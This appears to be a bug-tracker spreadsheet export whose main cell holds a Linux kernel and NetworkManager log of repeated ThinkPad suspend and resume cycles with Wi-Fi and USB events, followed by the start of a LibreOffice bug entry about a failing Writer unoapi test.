 cfg80211: Calling CRDA to update world regulatory domain
info&gt; (wlan0): supplicant interface state: completed -&gt; disconnected
 cfg80211: World regulatory domain updated:
 cfg80211:     (start_freq - end_freq @ bandwidth) (max_antenna_gain max_eirp)
 cfg80211:     (2402000 KHz - 2472000 KHz @ 40000 KHz) (300 mBi 2000 mBm)
 cfg80211:     (2457000 KHz - 2482000 KHz @ 20000 KHz) (300 mBi 2000 mBm)
 cfg80211:     (2474000 KHz - 2494000 KHz @ 20000 KHz) (300 mBi 2000 mBm)
 cfg80211:     (5170000 KHz - 5250000 KHz @ 40000 KHz) (300 mBi 2000 mBm)
 cfg80211:     (5735000 KHz - 5835000 KHz @ 40000 KHz) (300 mBi 2000 mBm)
 cfg80211: Calling CRDA for country: CZ
 cfg80211: Regulatory domain changed to country: CZ
 cfg80211:     (start_freq - end_freq @ bandwidth) (max_antenna_gain max_eirp)
 cfg80211:     (2400000 KHz - 2483500 KHz @ 40000 KHz) (N/A 2000 mBm)
 cfg80211:     (5150000 KHz - 5250000 KHz @ 40000 KHz) (N/A 2301 mBm)
 cfg80211:     (5250000 KHz - 5350000 KHz @ 40000 KHz) (N/A 2000 mBm)
 cfg80211:     (5470000 KHz - 5725000 KHz @ 40000 KHz) (N/A 2698 mBm)
Activating service name='org.freedesktop.PackageKit' argv0='/lib64/dbus-1/dbus-daemon-launch-helper'
info&gt; (wlan0): supplicant interface state: disconnected -&gt; scanning
Service 'org.freedesktop.PolicyKit1' is already active
Successfully activated service 'org.freedesktop.PackageKit'
 usb 2-1: new full speed USB device number 4 using uhci_hcd
 usb 2-1: New USB device found idVendor=0a5c idProduct=2110
 usb 2-1: New USB device strings: Mfr=1 Product=2 SerialNumber=0
 usb 2-1: Product: BCM2045B
 usb 2-1: Manufacturer: Broadcom Corp
info&gt; (wlan0): supplicant interface state: scanning -&gt; authenticating
info&gt; (wlan0): supplicant interface state: authenticating -&gt; associating
info&gt; (wlan0): supplicant interface state: associating -&gt; 4-way handshake
info&gt; (wlan0): supplicant interface state: 4-way handshake -&gt; completed
QUEST on wlan0 to 192.168.192.1 port 67
K from 192.168.192.1
to 192.168.192.99 -- renewal in 32195 seconds.
info&gt; (wlan0): DHCPv4 state changed reboot -&gt; renew
info&gt;   address 192.168.192.99
info&gt;   prefix 24 (255.255.255.0)
info&gt;   gateway 192.168.192.1
info&gt;   hostname 'kabi'
info&gt;   nameserver '192.168.192.1'
Activating service name='org.freedesktop.nm_dispatcher' argv0='/lib64/dbus-1/dbus-daemon-launch-helper'
Successfully activated service 'org.freedesktop.nm_dispatcher'
 ACPI: \_SB_.GDCK - undocking
 usb 2-1: USB disconnect device number 4
 systemd[1]: Service bluetooth.target is not needed anymore. Stopping.
 PM: Syncing filesystems ... done.
 Freezing user space processes ... (elapsed 0.01 seconds) done.
 Freezing remaining freezable tasks ... (elapsed 0.01 seconds) done.
 sd 0:0:0:0: [sda] Synchronizing SCSI cache
 sd 0:0:0:0: [sda] Stopping disk
 sdhci-pci 0000:15:00.3: PCI INT C disabled
 sdhci-pci 0000:15:00.2: PCI INT C disabled
 ata_piix 0000:00:1f.1: PCI INT C disabled
 ehci_hcd 0000:00:1d.7: PCI INT D disabled
 uhci_hcd 0000:00:1d.2: PCI INT C disabled
 uhci_hcd 0000:00:1d.1: PCI INT B disabled
 uhci_hcd 0000:00:1d.0: PCI INT A disabled
 HDA Intel 0000:00:1b.0: PCI INT B disabled
 ehci_hcd 0000:00:1a.7: PCI INT C disabled
 uhci_hcd 0000:00:1a.1: PCI INT B disabled
 uhci_hcd 0000:00:1a.0: PCI INT A disabled
 i915 0000:00:02.0: power state changed by ACPI to D3
 e1000e 0000:00:19.0: wake-up capability enabled by ACPI
 PM: suspend of devices complete after 447.927 msecs
 ehci_hcd 0000:00:1d.7: power state changed by ACPI to D3
 uhci_hcd 0000:00:1d.2: power state changed by ACPI to D3
 uhci_hcd 0000:00:1d.0: power state changed by ACPI to D3
 ehci_hcd 0000:00:1a.7: power state changed by ACPI to D3
 uhci_hcd 0000:00:1a.1: power state changed by ACPI to D3
 PM: late suspend of devices complete after 56.880 msecs
 ACPI: Preparing to enter system sleep state S3
 PM: Saving platform NVS memory
 Disabling non-boot CPUs ...
 CPU 1 is now offline
 lockdep: fixing up alternatives.
 Extended CMOS year: 2000
 ACPI: Low-level resume complete
 PM: Restoring platform NVS memory
 Extended CMOS year: 2000
 Enabling non-boot CPUs ...
 lockdep: fixing up alternatives.
 Booting Node 0 Processor 1 APIC 0x1
 Switched to NOHz mode on CPU #1
 NMI watchdog enabled takes one hw-pmu counter.
 CPU1 is up
 ACPI: Waking up from system sleep state S3
 uhci_hcd 0000:00:1a.1: power state changed by ACPI to D0
 uhci_hcd 0000:00:1a.1: power state changed by ACPI to D0
 uhci_hcd 0000:00:1a.1: power state changed by ACPI to D0
 uhci_hcd 0000:00:1a.1: power state changed by ACPI to D0
 ehci_hcd 0000:00:1a.7: power state changed by ACPI to D0
 ehci_hcd 0000:00:1a.7: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.0: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.0: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.0: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.0: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.2: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.2: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.2: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.2: power state changed by ACPI to D0
 ehci_hcd 0000:00:1d.7: power state changed by ACPI to D0
 ehci_hcd 0000:00:1d.7: power state changed by ACPI to D0
 sdhci-pci 0000:15:00.2: BAR 0: set to [mem 0xf8301000-0xf83010ff] (PCI address [0xf8301000-0xf83010ff])
 sdhci-pci 0000:15:00.3: BAR 0: set to [mem 0xf8301400-0xf83014ff] (PCI address [0xf8301400-0xf83014ff])
 PM: early resume of devices complete after 47.399 msecs
 i915 0000:00:02.0: power state changed by ACPI to D0
 i915 0000:00:02.0: power state changed by ACPI to D0
 e1000e 0000:00:19.0: wake-up capability disabled by ACPI
 uhci_hcd 0000:00:1a.0: PCI INT A -&gt; GSI 20 (level low) -&gt; IRQ 20
 usb usb2: root hub lost power or was reset
 uhci_hcd 0000:00:1a.1: power state changed by ACPI to D0
 uhci_hcd 0000:00:1a.1: power state changed by ACPI to D0
 uhci_hcd 0000:00:1a.1: PCI INT B -&gt; GSI 21 (level low) -&gt; IRQ 21
 usb usb3: root hub lost power or was reset
 ehci_hcd 0000:00:1a.7: power state changed by ACPI to D0
 ehci_hcd 0000:00:1a.7: power state changed by ACPI to D0
 ehci_hcd 0000:00:1a.7: PCI INT C -&gt; GSI 22 (level low) -&gt; IRQ 22
 HDA Intel 0000:00:1b.0: PCI INT B -&gt; GSI 17 (level low) -&gt; IRQ 17
 uhci_hcd 0000:00:1d.0: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.0: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.0: PCI INT A -&gt; GSI 16 (level low) -&gt; IRQ 16
 usb usb4: root hub lost power or was reset
 uhci_hcd 0000:00:1d.1: PCI INT B -&gt; GSI 17 (level low) -&gt; IRQ 17
 usb usb6: root hub lost power or was reset
 uhci_hcd 0000:00:1d.2: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.2: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.2: PCI INT C -&gt; GSI 18 (level low) -&gt; IRQ 18
 usb usb7: root hub lost power or was reset
 ehci_hcd 0000:00:1d.7: power state changed by ACPI to D0
 ehci_hcd 0000:00:1d.7: power state changed by ACPI to D0
 ehci_hcd 0000:00:1d.7: PCI INT D -&gt; GSI 19 (level low) -&gt; IRQ 19
 ata_piix 0000:00:1f.1: PCI INT C -&gt; GSI 16 (level low) -&gt; IRQ 16
 sdhci-pci 0000:15:00.2: PCI INT C -&gt; GSI 18 (level low) -&gt; IRQ 18
 sdhci-pci 0000:15:00.2: Will use DMA mode even though HW doesn't fully claim to support it.
 sdhci-pci 0000:15:00.3: PCI INT C -&gt; GSI 18 (level low) -&gt; IRQ 18
 sd 0:0:0:0: [sda] Starting disk
 ata4.00: ACPI cmd ef/03:42:00:00:00:a0 (SET FEATURES) filtered out
 ata4.00: ACPI cmd ef/03:0c:00:00:00:a0 (SET FEATURES) filtered out
 ata4.00: configured for UDMA/33
 ata3: SATA link down (SStatus 0 SControl 300)
 usb 2-2: reset full speed USB device number 3 using uhci_hcd
 ata1: SATA link up 1.5 Gbps (SStatus 113 SControl 300)
 ata1.00: ACPI cmd f5/00:00:00:00:00:a0 (SECURITY FREEZE LOCK) filtered out
 ata1.00: ACPI cmd ef/10:03:00:00:00:a0 (SET FEATURES) filtered out
 ata1.00: ACPI cmd f5/00:00:00:00:00:a0 (SECURITY FREEZE LOCK) filtered out
 ata1.00: ACPI cmd ef/10:03:00:00:00:a0 (SET FEATURES) filtered out
 ata1.00: configured for UDMA/100
 thinkpad_acpi: ACPI backlight control delay disabled
 PM: resume of devices complete after 3319.876 msecs
 Restarting tasks ... 
 done.
 video LNXVIDEO:00: Restoring backlight state
 usb 2-1: new full speed USB device number 5 using uhci_hcd
 usb 2-1: New USB device found idVendor=0a5c idProduct=2110
 usb 2-1: New USB device strings: Mfr=1 Product=2 SerialNumber=0
 usb 2-1: Product: BCM2045B
 usb 2-1: Manufacturer: Broadcom Corp
 cfg80211: Calling CRDA to update world regulatory domain
info&gt; (wlan0): supplicant interface state: completed -&gt; disconnected
 cfg80211: World regulatory domain updated:
 cfg80211:     (start_freq - end_freq @ bandwidth) (max_antenna_gain max_eirp)
 cfg80211:     (2402000 KHz - 2472000 KHz @ 40000 KHz) (300 mBi 2000 mBm)
 cfg80211:     (2457000 KHz - 2482000 KHz @ 20000 KHz) (300 mBi 2000 mBm)
 cfg80211:     (2474000 KHz - 2494000 KHz @ 20000 KHz) (300 mBi 2000 mBm)
 cfg80211:     (5170000 KHz - 5250000 KHz @ 40000 KHz) (300 mBi 2000 mBm)
 cfg80211:     (5735000 KHz - 5835000 KHz @ 40000 KHz) (300 mBi 2000 mBm)
 cfg80211: Calling CRDA for country: CZ
 cfg80211: Regulatory domain changed to country: CZ
 cfg80211:     (start_freq - end_freq @ bandwidth) (max_antenna_gain max_eirp)
 cfg80211:     (2400000 KHz - 2483500 KHz @ 40000 KHz) (N/A 2000 mBm)
 cfg80211:     (5150000 KHz - 5250000 KHz @ 40000 KHz) (N/A 2301 mBm)
 cfg80211:     (5250000 KHz - 5350000 KHz @ 40000 KHz) (N/A 2000 mBm)
 cfg80211:     (5470000 KHz - 5725000 KHz @ 40000 KHz) (N/A 2698 mBm)
info&gt; (wlan0): supplicant interface state: disconnected -&gt; scanning
 thinkpad_acpi: fan watchdog: enabling fan
 ACPI: \_SB_.GDCK - undocking
 usb 2-1: USB disconnect device number 5
 systemd[1]: Service bluetooth.target is not needed anymore. Stopping.
 PM: Syncing filesystems ... done.
 Freezing user space processes ... (elapsed 0.01 seconds) done.
 Freezing remaining freezable tasks ... (elapsed 0.01 seconds) done.
 sd 0:0:0:0: [sda] Synchronizing SCSI cache
 sd 0:0:0:0: [sda] Stopping disk
 sdhci-pci 0000:15:00.3: PCI INT C disabled
 ata_piix 0000:00:1f.1: PCI INT C disabled
 ehci_hcd 0000:00:1d.7: PCI INT D disabled
 uhci_hcd 0000:00:1d.2: PCI INT C disabled
 uhci_hcd 0000:00:1d.1: PCI INT B disabled
 uhci_hcd 0000:00:1d.0: PCI INT A disabled
 sdhci-pci 0000:15:00.2: PCI INT C disabled
 HDA Intel 0000:00:1b.0: PCI INT B disabled
 ehci_hcd 0000:00:1a.7: PCI INT C disabled
 uhci_hcd 0000:00:1a.1: PCI INT B disabled
 uhci_hcd 0000:00:1a.0: PCI INT A disabled
 i915 0000:00:02.0: power state changed by ACPI to D3
 e1000e 0000:00:19.0: wake-up capability enabled by ACPI
 PM: suspend of devices complete after 444.625 msecs
 ehci_hcd 0000:00:1d.7: power state changed by ACPI to D3
 uhci_hcd 0000:00:1d.2: power state changed by ACPI to D3
 uhci_hcd 0000:00:1d.0: power state changed by ACPI to D3
 ehci_hcd 0000:00:1a.7: power state changed by ACPI to D3
 uhci_hcd 0000:00:1a.1: power state changed by ACPI to D3
 PM: late suspend of devices complete after 56.879 msecs
 ACPI: Preparing to enter system sleep state S3
 PM: Saving platform NVS memory
 Disabling non-boot CPUs ...
 CPU 1 is now offline
 lockdep: fixing up alternatives.
 Extended CMOS year: 2000
 ACPI: Low-level resume complete
 PM: Restoring platform NVS memory
 Extended CMOS year: 2000
 Enabling non-boot CPUs ...
 lockdep: fixing up alternatives.
 Booting Node 0 Processor 1 APIC 0x1
 Switched to NOHz mode on CPU #1
 NMI watchdog enabled takes one hw-pmu counter.
 CPU1 is up
 ACPI: Waking up from system sleep state S3
 uhci_hcd 0000:00:1a.1: power state changed by ACPI to D0
 uhci_hcd 0000:00:1a.1: power state changed by ACPI to D0
 uhci_hcd 0000:00:1a.1: power state changed by ACPI to D0
 uhci_hcd 0000:00:1a.1: power state changed by ACPI to D0
 ehci_hcd 0000:00:1a.7: power state changed by ACPI to D0
 ehci_hcd 0000:00:1a.7: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.0: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.0: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.0: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.0: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.2: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.2: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.2: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.2: power state changed by ACPI to D0
 ehci_hcd 0000:00:1d.7: power state changed by ACPI to D0
 ehci_hcd 0000:00:1d.7: power state changed by ACPI to D0
 sdhci-pci 0000:15:00.2: BAR 0: set to [mem 0xf8301000-0xf83010ff] (PCI address [0xf8301000-0xf83010ff])
 sdhci-pci 0000:15:00.3: BAR 0: set to [mem 0xf8301400-0xf83014ff] (PCI address [0xf8301400-0xf83014ff])
 PM: early resume of devices complete after 47.857 msecs
 uhci_hcd 0000:00:1a.0: PCI INT A -&gt; GSI 20 (level low) -&gt; IRQ 20
 usb usb2: root hub lost power or was reset
 e1000e 0000:00:19.0: wake-up capability disabled by ACPI
 uhci_hcd 0000:00:1a.1: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.1: PCI INT B -&gt; GSI 17 (level low) -&gt; IRQ 17
 usb usb6: root hub lost power or was reset
 ehci_hcd 0000:00:1a.7: power state changed by ACPI to D0
 sdhci-pci 0000:15:00.3: PCI INT C -&gt; GSI 18 (level low) -&gt; IRQ 18
 sdhci-pci 0000:15:00.2: PCI INT C -&gt; GSI 18 (level low) -&gt; IRQ 18
 sdhci-pci 0000:15:00.2: Will use DMA mode even though HW doesn't fully claim to support it.
 uhci_hcd 0000:00:1d.0: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.2: power state changed by ACPI to D0
 ehci_hcd 0000:00:1d.7: power state changed by ACPI to D0
 HDA Intel 0000:00:1b.0: PCI INT B -&gt; GSI 17 (level low) -&gt; IRQ 17
 uhci_hcd 0000:00:1a.1: power state changed by ACPI to D0
 uhci_hcd 0000:00:1a.1: PCI INT B -&gt; GSI 21 (level low) -&gt; IRQ 21
 usb usb3: root hub lost power or was reset
 ata_piix 0000:00:1f.1: PCI INT C -&gt; GSI 16 (level low) -&gt; IRQ 16
 sd 0:0:0:0: [sda] Starting disk
 ehci_hcd 0000:00:1a.7: power state changed by ACPI to D0
 ehci_hcd 0000:00:1a.7: PCI INT C -&gt; GSI 22 (level low) -&gt; IRQ 22
 uhci_hcd 0000:00:1d.0: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.0: PCI INT A -&gt; GSI 16 (level low) -&gt; IRQ 16
 usb usb4: root hub lost power or was reset
 uhci_hcd 0000:00:1d.2: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.2: PCI INT C -&gt; GSI 18 (level low) -&gt; IRQ 18
 usb usb7: root hub lost power or was reset
 ehci_hcd 0000:00:1d.7: power state changed by ACPI to D0
 ehci_hcd 0000:00:1d.7: PCI INT D -&gt; GSI 19 (level low) -&gt; IRQ 19
 i915 0000:00:02.0: power state changed by ACPI to D0
 i915 0000:00:02.0: power state changed by ACPI to D0
 ata4.00: ACPI cmd ef/03:42:00:00:00:a0 (SET FEATURES) filtered out
 ata4.00: ACPI cmd ef/03:0c:00:00:00:a0 (SET FEATURES) filtered out
 ata4.00: configured for UDMA/33
 ata3: SATA link down (SStatus 0 SControl 300)
 usb 2-2: reset full speed USB device number 3 using uhci_hcd
 ata1: SATA link up 1.5 Gbps (SStatus 113 SControl 300)
 ata1.00: ACPI cmd f5/00:00:00:00:00:a0 (SECURITY FREEZE LOCK) filtered out
 ata1.00: ACPI cmd ef/10:03:00:00:00:a0 (SET FEATURES) filtered out
 ata1.00: ACPI cmd f5/00:00:00:00:00:a0 (SECURITY FREEZE LOCK) filtered out
 ata1.00: ACPI cmd ef/10:03:00:00:00:a0 (SET FEATURES) filtered out
 ata1.00: configured for UDMA/100
 thinkpad_acpi: ACPI backlight control delay disabled
 PM: resume of devices complete after 3434.468 msecs
 Restarting tasks ... 
 done.
 video LNXVIDEO:00: Restoring backlight state
 usb 2-1: new full speed USB device number 6 using uhci_hcd
 usb 2-1: New USB device found idVendor=0a5c idProduct=2110
 usb 2-1: New USB device strings: Mfr=1 Product=2 SerialNumber=0
 usb 2-1: Product: BCM2045B
 usb 2-1: Manufacturer: Broadcom Corp
info&gt; (wlan0): device state change: 100 -&gt; 30 (reason 11)
info&gt; (wlan0): deactivating device (reason: 11).
info&gt; (wlan0): canceled DHCP transaction DHCP client pid 1394
hdrawing address record for 192.168.192.99 on wlan0.
ving mDNS multicast group on interface wlan0.IPv4 with address 192.168.192.99.
erface wlan0.IPv4 no longer relevant for mDNS.
info&gt; Setting system hostname to 'linux' (no default device)
Activating service name='org.freedesktop.nm_dispatcher' argv0='/lib64/dbus-1/dbus-daemon-launch-helper'
nterrupted system call
d by signal: 15
Successfully activated service 'org.freedesktop.nm_dispatcher'
hdrawing workstation service for tun0.
info&gt; (wlan0): supplicant interface state: scanning -&gt; disconnected
warn&gt; Couldn't disconnect supplicant interface: This interface is not connected.
info&gt; (wlan0): supplicant interface state: disconnected -&gt; inactive
terface #6 tun0 10.36.10.243#123 interface stats: received=0 sent=0 dropped=0 active_time=937 secs
terface #3 wlan0 192.168.192.99#123 interface stats: received=268 sent=269 dropped=0 active_time=26811 secs
4 interface 192.168.192.99 -&gt; (none)
.182 interface 192.168.192.99 -&gt; (none)
.12 interface 192.168.192.99 -&gt; (none)
1 interface 192.168.192.99 -&gt; (none)
shed
 ACPI: \_SB_.GDCK - undocking
 usb 2-1: USB disconnect device number 6
 systemd[1]: Service bluetooth.target is not needed anymore. Stopping.
rs found in /etc/resolv.conf will retry
e canary thread is apparently starving. Taking action.
moting known real-time threads.
ccessfully demoted thread 6377 of process 6365 (/usr/bin/pulseaudio).
ccessfully demoted thread 6376 of process 6365 (/usr/bin/pulseaudio).
ccessfully demoted thread 6365 of process 6365 (/usr/bin/pulseaudio).
ccessfully demoted thread 6191 of process 6181 (/usr/bin/pulseaudio).
ccessfully demoted thread 6190 of process 6181 (/usr/bin/pulseaudio).
moted 5 threads.
 PM: Syncing filesystems ... done.
 Freezing user space processes ... (elapsed 0.01 seconds) done.
 Freezing remaining freezable tasks ... (elapsed 0.01 seconds) done.
 sd 0:0:0:0: [sda] Synchronizing SCSI cache
 sd 0:0:0:0: [sda] Stopping disk
 sdhci-pci 0000:15:00.3: PCI INT C disabled
 sdhci-pci 0000:15:00.2: PCI INT C disabled
 ata_piix 0000:00:1f.1: PCI INT C disabled
 ehci_hcd 0000:00:1d.7: PCI INT D disabled
 uhci_hcd 0000:00:1d.2: PCI INT C disabled
 uhci_hcd 0000:00:1d.1: PCI INT B disabled
 uhci_hcd 0000:00:1d.0: PCI INT A disabled
 HDA Intel 0000:00:1b.0: PCI INT B disabled
 ehci_hcd 0000:00:1a.7: PCI INT C disabled
 uhci_hcd 0000:00:1a.1: PCI INT B disabled
 uhci_hcd 0000:00:1a.0: PCI INT A disabled
 i915 0000:00:02.0: power state changed by ACPI to D3
 e1000e 0000:00:19.0: wake-up capability enabled by ACPI
 PM: suspend of devices complete after 441.254 msecs
 ehci_hcd 0000:00:1d.7: power state changed by ACPI to D3
 uhci_hcd 0000:00:1d.2: power state changed by ACPI to D3
 uhci_hcd 0000:00:1d.0: power state changed by ACPI to D3
 ehci_hcd 0000:00:1a.7: power state changed by ACPI to D3
 uhci_hcd 0000:00:1a.1: power state changed by ACPI to D3
 PM: late suspend of devices complete after 56.880 msecs
 ACPI: Preparing to enter system sleep state S3
 PM: Saving platform NVS memory
 Disabling non-boot CPUs ...
 CPU 1 is now offline
 lockdep: fixing up alternatives.
 Extended CMOS year: 2000
 ACPI: Low-level resume complete
info&gt; VPN service 'vpnc' disappeared
 PM: Restoring platform NVS memory
 Extended CMOS year: 2000
 Enabling non-boot CPUs ...
 lockdep: fixing up alternatives.
 Booting Node 0 Processor 1 APIC 0x1
 Switched to NOHz mode on CPU #1
 NMI watchdog enabled takes one hw-pmu counter.
 CPU1 is up
 ACPI: Waking up from system sleep state S3
 uhci_hcd 0000:00:1a.1: power state changed by ACPI to D0
 uhci_hcd 0000:00:1a.1: power state changed by ACPI to D0
 uhci_hcd 0000:00:1a.1: power state changed by ACPI to D0
 uhci_hcd 0000:00:1a.1: power state changed by ACPI to D0
 ehci_hcd 0000:00:1a.7: power state changed by ACPI to D0
 ehci_hcd 0000:00:1a.7: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.0: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.0: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.0: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.0: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.2: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.2: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.2: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.2: power state changed by ACPI to D0
 ehci_hcd 0000:00:1d.7: power state changed by ACPI to D0
 ehci_hcd 0000:00:1d.7: power state changed by ACPI to D0
 sdhci-pci 0000:15:00.2: BAR 0: set to [mem 0xf8301000-0xf83010ff] (PCI address [0xf8301000-0xf83010ff])
 sdhci-pci 0000:15:00.3: BAR 0: set to [mem 0xf8301400-0xf83014ff] (PCI address [0xf8301400-0xf83014ff])
 PM: early resume of devices complete after 47.393 msecs
 i915 0000:00:02.0: power state changed by ACPI to D0
 i915 0000:00:02.0: power state changed by ACPI to D0
 e1000e 0000:00:19.0: wake-up capability disabled by ACPI
 uhci_hcd 0000:00:1a.0: PCI INT A -&gt; GSI 20 (level low) -&gt; IRQ 20
 usb usb2: root hub lost power or was reset
 uhci_hcd 0000:00:1a.1: power state changed by ACPI to D0
 uhci_hcd 0000:00:1a.1: power state changed by ACPI to D0
 uhci_hcd 0000:00:1a.1: PCI INT B -&gt; GSI 21 (level low) -&gt; IRQ 21
 usb usb3: root hub lost power or was reset
 ehci_hcd 0000:00:1a.7: power state changed by ACPI to D0
 ehci_hcd 0000:00:1a.7: power state changed by ACPI to D0
 ehci_hcd 0000:00:1a.7: PCI INT C -&gt; GSI 22 (level low) -&gt; IRQ 22
 HDA Intel 0000:00:1b.0: PCI INT B -&gt; GSI 17 (level low) -&gt; IRQ 17
 uhci_hcd 0000:00:1d.0: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.0: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.0: PCI INT A -&gt; GSI 16 (level low) -&gt; IRQ 16
 usb usb4: root hub lost power or was reset
 uhci_hcd 0000:00:1d.1: PCI INT B -&gt; GSI 17 (level low) -&gt; IRQ 17
 usb usb6: root hub lost power or was reset
 uhci_hcd 0000:00:1d.2: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.2: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.2: PCI INT C -&gt; GSI 18 (level low) -&gt; IRQ 18
 usb usb7: root hub lost power or was reset
 ehci_hcd 0000:00:1d.7: power state changed by ACPI to D0
 ehci_hcd 0000:00:1d.7: power state changed by ACPI to D0
 ehci_hcd 0000:00:1d.7: PCI INT D -&gt; GSI 19 (level low) -&gt; IRQ 19
 ata_piix 0000:00:1f.1: PCI INT C -&gt; GSI 16 (level low) -&gt; IRQ 16
 sdhci-pci 0000:15:00.2: PCI INT C -&gt; GSI 18 (level low) -&gt; IRQ 18
 sdhci-pci 0000:15:00.2: Will use DMA mode even though HW doesn't fully claim to support it.
 sdhci-pci 0000:15:00.3: PCI INT C -&gt; GSI 18 (level low) -&gt; IRQ 18
 sd 0:0:0:0: [sda] Starting disk
 ata4.00: ACPI cmd ef/03:42:00:00:00:a0 (SET FEATURES) filtered out
 ata4.00: ACPI cmd ef/03:0c:00:00:00:a0 (SET FEATURES) filtered out
 ata4.00: configured for UDMA/33
 ata3: SATA link down (SStatus 0 SControl 300)
 usb 2-2: reset full speed USB device number 3 using uhci_hcd
 ata1: SATA link up 1.5 Gbps (SStatus 113 SControl 300)
 ata1.00: ACPI cmd f5/00:00:00:00:00:a0 (SECURITY FREEZE LOCK) filtered out
 ata1.00: ACPI cmd ef/10:03:00:00:00:a0 (SET FEATURES) filtered out
 ata1.00: ACPI cmd f5/00:00:00:00:00:a0 (SECURITY FREEZE LOCK) filtered out
 ata1.00: ACPI cmd ef/10:03:00:00:00:a0 (SET FEATURES) filtered out
 ata1.00: configured for UDMA/100
 thinkpad_acpi: ACPI backlight control delay disabled
 PM: resume of devices complete after 3371.694 msecs
 Restarting tasks ... 
 done.
 video LNXVIDEO:00: Restoring backlight state
 usb 2-1: new full speed USB device number 7 using uhci_hcd
 usb 2-1: New USB device found idVendor=0a5c idProduct=2110
 usb 2-1: New USB device strings: Mfr=1 Product=2 SerialNumber=0
 usb 2-1: Product: BCM2045B
 usb 2-1: Manufacturer: Broadcom Corp
 ACPI: \_SB_.GDCK - undocking
 thinkpad_acpi: fan watchdog: enabling fan
 usb 2-1: USB disconnect device number 7
 systemd[1]: Service bluetooth.target is not needed anymore. Stopping.
 PM: Syncing filesystems ... done.
 Freezing user space processes ... (elapsed 0.01 seconds) done.
 Freezing remaining freezable tasks ... (elapsed 0.01 seconds) done.
 sd 0:0:0:0: [sda] Synchronizing SCSI cache
 sd 0:0:0:0: [sda] Stopping disk
 sdhci-pci 0000:15:00.3: PCI INT C disabled
 sdhci-pci 0000:15:00.2: PCI INT C disabled
 ehci_hcd 0000:00:1d.7: PCI INT D disabled
 uhci_hcd 0000:00:1d.2: PCI INT C disabled
 uhci_hcd 0000:00:1d.1: PCI INT B disabled
 uhci_hcd 0000:00:1d.0: PCI INT A disabled
 ehci_hcd 0000:00:1a.7: PCI INT C disabled
 HDA Intel 0000:00:1b.0: PCI INT B disabled
 uhci_hcd 0000:00:1a.1: PCI INT B disabled
 uhci_hcd 0000:00:1a.0: PCI INT A disabled
 ata_piix 0000:00:1f.1: PCI INT C disabled
 i915 0000:00:02.0: power state changed by ACPI to D3
 e1000e 0000:00:19.0: wake-up capability enabled by ACPI
 PM: suspend of devices complete after 464.620 msecs
 ehci_hcd 0000:00:1d.7: power state changed by ACPI to D3
 uhci_hcd 0000:00:1d.2: power state changed by ACPI to D3
 uhci_hcd 0000:00:1d.0: power state changed by ACPI to D3
 ehci_hcd 0000:00:1a.7: power state changed by ACPI to D3
 uhci_hcd 0000:00:1a.1: power state changed by ACPI to D3
 PM: late suspend of devices complete after 56.873 msecs
 ACPI: Preparing to enter system sleep state S3
 PM: Saving platform NVS memory
 Disabling non-boot CPUs ...
 CPU 1 is now offline
 lockdep: fixing up alternatives.
 Extended CMOS year: 2000
 ACPI: Low-level resume complete
 PM: Restoring platform NVS memory
 Extended CMOS year: 2000
 Enabling non-boot CPUs ...
 lockdep: fixing up alternatives.
 Booting Node 0 Processor 1 APIC 0x1
 Switched to NOHz mode on CPU #1
 NMI watchdog enabled takes one hw-pmu counter.
 CPU1 is up
 ACPI: Waking up from system sleep state S3
 [drm] Changing LVDS panel from (+hsync +vsync) to (-hsync -vsync)
 uhci_hcd 0000:00:1a.1: power state changed by ACPI to D0
 uhci_hcd 0000:00:1a.1: power state changed by ACPI to D0
 uhci_hcd 0000:00:1a.1: power state changed by ACPI to D0
 uhci_hcd 0000:00:1a.1: power state changed by ACPI to D0
 ehci_hcd 0000:00:1a.7: power state changed by ACPI to D0
 ehci_hcd 0000:00:1a.7: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.0: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.0: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.0: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.0: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.2: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.2: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.2: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.2: power state changed by ACPI to D0
 ehci_hcd 0000:00:1d.7: power state changed by ACPI to D0
 ehci_hcd 0000:00:</t>
  </si>
  <si>
    <t>zdenek.kabelac</t>
  </si>
  <si>
    <t>LIBREOFFICE-35661</t>
  </si>
  <si>
    <t>sw.SwXViewSettings::com::sun::star::text::ViewSettings fails</t>
  </si>
  <si>
    <t>The unoapi test sw.SwXViewSettings::com::sun::star::text::ViewSettings fails
in writer. To reproduce remove the test from the blacklist at:
